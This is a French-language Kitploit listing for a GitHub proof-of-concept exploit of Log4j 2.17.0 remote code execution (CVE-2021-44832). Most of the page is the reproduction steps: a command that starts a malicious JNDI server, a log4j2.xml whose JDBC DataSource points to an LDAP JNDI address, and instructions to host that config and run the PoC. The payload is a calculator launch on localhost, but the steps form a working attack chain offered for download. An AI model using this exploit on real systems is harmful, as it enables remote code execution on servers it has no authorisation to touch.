Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
log4j_RCE_CVE-2021-44832 — Preuve de concept d'exploitation pour Log4j 2.17.0 RCE (CVE-2021-44832) utilisant l'injection JNDI avec déploiement d'un fichier de configuration malveillant. | Kitploit
Outils/GitHubGitHub/cckuailong/log4j_rce_cve-2021-44832
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCommandement et ContrôleOutil d'Accès à Distance
GitHubcckuailong/log4j_rce_cve-2021-44832

log4j_RCE_CVE-2021-44832

Preuve de concept d'exploitation pour Log4j 2.17.0 RCE (CVE-2021-44832) utilisant l'injection JNDI avec déploiement d'un fichier de configuration malveillant.

Voir le dépôt
411il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Log4j 2.17.0 RCE -- CVE-2021-44832

Reproduction

  1. Démarrer le serveur jndi malveillant
root@kitploit:~
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"

  1. Modifiez la section DataSource dans config/log4j2.xml avec l'adresse jndi que vous avez générée
root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="error">
    <Appenders>
        <JDBC name="databaseAppender" tableName="dbo.application_log">
            <DataSource jndiName="ldap://127.0.0.1:1389/nvrcl6" />
            <Column name="eventDate" isEventTimestamp="true" />
            <Column name="level" pattern="%level" />
            <Column name="logger" pattern="%logger" />
            <Column name="message" pattern="%message" />
            <Column name="exception" pattern="%ex{full}" />
        </JDBC>
    </Appenders>
    <Loggers>
        <Root level="warn">
            <AppenderRef ref="databaseAppender"/>
        </Root>
    </Loggers>
</Configuration>

Déployez le fichier de configuration sur votre propre serveur HTTP

  1. Modifier le Poc

Remplacez-le par le fichier de configuration déployé sur votre serveur HTTP

  1. Exécuter

Sujet Log4shell

https://github.com/cckuailong/reapoc/tree/main/Topic/Log4j

Bienvenue pour contribuer à reapoc

https://github.com/cckuailong/reapoc

Télécharger l’outil